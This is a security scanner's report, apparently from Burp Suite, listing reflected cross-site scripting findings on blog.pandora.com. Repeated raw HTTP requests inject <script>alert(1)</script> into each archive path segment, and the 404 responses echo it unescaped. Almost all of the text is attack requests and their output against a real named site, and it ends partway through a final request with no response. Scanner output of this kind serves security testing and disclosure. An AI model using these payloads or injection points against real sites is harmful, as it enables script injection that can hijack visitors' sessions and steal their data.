The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e57ea<script>alert(1)</script>aa701cd74e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008e57ea<script>alert(1)</script>aa701cd74e3/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008e57ea<script>alert(1)</script>aa701cd74e3/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 500d6<script>alert(1)</script>b55ef145dcc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/09500d6<script>alert(1)</script>b55ef145dcc/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:04 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/09500d6<script>alert(1)</script>b55ef145dcc/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 872c8<script>alert(1)</script>e32ca06f3d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora872c8<script>alert(1)</script>e32ca06f3d3/archives/2008/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora872c8<script>alert(1)</script>e32ca06f3d3/archives/2008/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 69a72<script>alert(1)</script>b4e2002f078 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives69a72<script>alert(1)</script>b4e2002f078/2008/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:53 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives69a72<script>alert(1)</script>b4e2002f078/2008/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c1a34<script>alert(1)</script>3e603248071 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008c1a34<script>alert(1)</script>3e603248071/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008c1a34<script>alert(1)</script>3e603248071/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ef2f7<script>alert(1)</script>b77f6aa2ff0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/10ef2f7<script>alert(1)</script>b77f6aa2ff0/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:02 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/10ef2f7<script>alert(1)</script>b77f6aa2ff0/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 685f7<script>alert(1)</script>b71e5ef0a26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora685f7<script>alert(1)</script>b71e5ef0a26/archives/2008/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora685f7<script>alert(1)</script>b71e5ef0a26/archives/2008/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bce64<script>alert(1)</script>e78182be82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbce64<script>alert(1)</script>e78182be82/2008/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbce64<script>alert(1)</script>e78182be82/2008/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6e4b2<script>alert(1)</script>1ff330e9b26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20086e4b2<script>alert(1)</script>1ff330e9b26/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:04 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20086e4b2<script>alert(1)</script>1ff330e9b26/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3a15c<script>alert(1)</script>5c048a41cfa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/113a15c<script>alert(1)</script>5c048a41cfa/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/113a15c<script>alert(1)</script>5c048a41cfa/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8089c<script>alert(1)</script>6c11535c8eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8089c<script>alert(1)</script>6c11535c8eb/archives/2008/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8089c<script>alert(1)</script>6c11535c8eb/archives/2008/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7be86<script>alert(1)</script>858dc5f1838 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives7be86<script>alert(1)</script>858dc5f1838/2008/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives7be86<script>alert(1)</script>858dc5f1838/2008/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9cdec<script>alert(1)</script>3afc3bd0abd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20089cdec<script>alert(1)</script>3afc3bd0abd/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:42 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20089cdec<script>alert(1)</script>3afc3bd0abd/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6330d<script>alert(1)</script>5cbccb3c131 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/126330d<script>alert(1)</script>5cbccb3c131/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:45 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/126330d<script>alert(1)</script>5cbccb3c131/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9e242<script>alert(1)</script>c3f15fa67f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9e242<script>alert(1)</script>c3f15fa67f4/archives/2009/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora9e242<script>alert(1)</script>c3f15fa67f4/archives/2009/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89b64<script>alert(1)</script>b2d3b4a18a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives89b64<script>alert(1)</script>b2d3b4a18a8/2009/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives89b64<script>alert(1)</script>b2d3b4a18a8/2009/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7feb3<script>alert(1)</script>350dc8da11b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20097feb3<script>alert(1)</script>350dc8da11b/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20097feb3<script>alert(1)</script>350dc8da11b/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4d46<script>alert(1)</script>419734980f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/01b4d46<script>alert(1)</script>419734980f5/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:06 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/01b4d46<script>alert(1)</script>419734980f5/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4d541<script>alert(1)</script>2442df8266b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4d541<script>alert(1)</script>2442df8266b/archives/2009/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora4d541<script>alert(1)</script>2442df8266b/archives/2009/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a4a2<script>alert(1)</script>ff59d7e80db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4a4a2<script>alert(1)</script>ff59d7e80db/2009/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
